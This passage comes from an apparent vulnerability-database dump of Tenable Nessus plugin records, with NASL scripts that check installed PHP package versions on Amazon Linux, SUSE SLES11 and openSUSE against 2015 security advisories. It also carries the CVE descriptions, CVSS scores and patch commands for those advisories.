script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php56-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-bcmath-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-cli-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-common-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dba-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dbg-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-debuginfo-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-devel-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-embedded-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-enchant-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-fpm-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gd-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gmp-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-imap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-intl-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-ldap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mbstring-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mcrypt-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mssql-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mysqlnd-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-odbc-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-opcache-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pdo-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pgsql-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-process-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pspell-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-recode-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-snmp-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-soap-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-tidy-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xml-5.6.14-1.119.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xmlrpc-5.6.14-1.119.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php56 / php56-bcmath / php56-cli / php56-common / php56-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:08", "description": "The PHP5 script interpreter was updated to fix security issues :\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2015-10-12T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php5 (SUSE-SU-2015:1701-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dbase", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-hash", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-pear", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1701-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86340", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1701-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86340);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"SUSE SLES11 Security Update : php5 (SUSE-SU-2015:1701-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP5 script interpreter was updated to fix security issues :\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151701-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28669fc0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-php5-12121=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-php5-12121=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"apache2-mod_php5-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-bcmath-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-bz2-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-calendar-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ctype-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-curl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dba-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dbase-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-dom-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-exif-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-fastcgi-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ftp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gd-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gettext-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-gmp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-hash-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-iconv-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-json-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-ldap-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mbstring-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mcrypt-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-mysql-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-odbc-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-openssl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pcntl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pdo-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pear-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pgsql-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-pspell-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-shmop-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-snmp-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-soap-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-suhosin-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvmsg-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvsem-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-sysvshm-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-tokenizer-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-wddx-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlreader-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlrpc-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xmlwriter-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-xsl-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-zip-5.2.14-0.7.30.72.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php5-zlib-5.2.14-0.7.30.72.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:33", "description": "The PHP5 script interpreter was updated to fix various security issues :\n\n - CVE-2015-6831: A use after free vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject items could be used to crash php or potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP files could be used to overwrite files outside of intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945403] \n\n - CVE-2015-6835: A Use After Free Vulnerability in session unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php5 (openSUSE-2015-609)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-fileinfo", 